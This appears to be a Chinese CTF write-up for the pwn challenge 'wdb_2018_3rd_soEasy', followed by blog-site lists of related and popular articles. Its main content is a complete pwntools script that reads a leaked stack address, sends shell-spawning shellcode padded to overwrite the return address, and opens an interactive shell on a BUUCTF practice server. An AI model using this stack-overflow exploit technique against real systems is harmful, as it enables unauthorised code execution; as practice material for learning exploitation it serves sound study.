wdb_2018_3rd_soEasy

查看保护


很明显的一道shellcode题目，0x48的大小的话直接用pwntools的shellcode即可。

from pwn import *context(arch='i386', os='linux', log_level='debug')file_name = './z1r0'debug = 1
if debug:r = remote('node4.buuoj.cn', 26049)
else:r = process(file_name)elf = ELF(file_name)def dbg():gdb.attach(r)r.recvuntil('0x')
buf = int(r.recv(8), 16)
success('buf = ' + hex(buf))shellcode = asm(shellcraft.sh())p1 = shellcode.ljust(0x48, b'a') + b'a' * 4 + p32(buf)r.sendline(p1)r.interactive()

wdb_2018_3rd_soEasy相关推荐

1. PWN-PRACTICE-BUUCTF-30

   PWN-PRACTICE-BUUCTF-30 suctf_2018_stack wdb_2018_3rd_soEasy [BSidesCF 2019]Runit qctf2018_stack2 suc ...

2. BUUCTF-pwn(15)

   gyctf_2020_some_thing_interesting 经典UAF漏洞! Allocate申请函数! Free释放函数! 全保护开启,故我们利用格式化字符串漏洞泄露libc地址,从而得到m ...

最新文章

1. 哪种营销方法效果最差_营销软文写作的三大技巧，你知道吗？
2. GO语言基础之reflect反射
3. 源代码阅读工具Source-Navigator 在ubuntu 9.04下的安装与问题解决
4. 第一章 1 常用库之time
5. 线上python课程一般多少钱-python学习费用多少合适
6. 人工神经网络算法有哪些,人工神经网络算法优点
7. 微信最新的系统默认emoji表情集
8. java秒杀源码_Java秒杀系统实战系列~商品秒杀代码实战
9. 机器学习：支持向量机
10. windows 驱动开发基础(二）事件通知---关于irp处理，DPC,链表等
11. GEE实现图像随机森林分类
12. CISCO服务器配置RAID步骤
13. Tomcat 基础配置
14. 华为国产系统Android,国产手机系统即将出现！华为将抛弃安卓：成功研发自有手机系统...
15. 鸭子的应聘，我是学c++的
16. 【21岁扶墙当CTO】之无人机篇（2/n）
17. iOS 二维码ZBarSDK类似微信的扫一扫
18. 分享网页文章到微信时如何自定义缩略图、链接、标题和摘要
19. HTML5怎么输入特殊符号,html5特殊符号
20. 数字IC前端学习笔记：LSFR（线性反馈移位寄存器）

热门文章

1. EAS Web：新增按钮弹出新页签
2. 微软OpenPAI平台搭建指南
3. 3GPP TS 29244-g30 中英文对照 | 5.4.14 Deferred PDR activation and deactivation
4. Matlab求解微分方程数值解
5. c语言13 6,C语言学习笔记13
6. ORACLE 参数 O7_DICTIONARY_ACCESSIBILITY
7. 哪款蓝牙耳机的音质好？盘点四款高颜值蓝牙耳机
8. SSM+社区线上超市购物系统 毕业设计-附源码211704
9. uni-app框架调研
10. jetson xiaver NX 安装tensorflow object detection api 遇到的tensorflow-addons 不能安装问题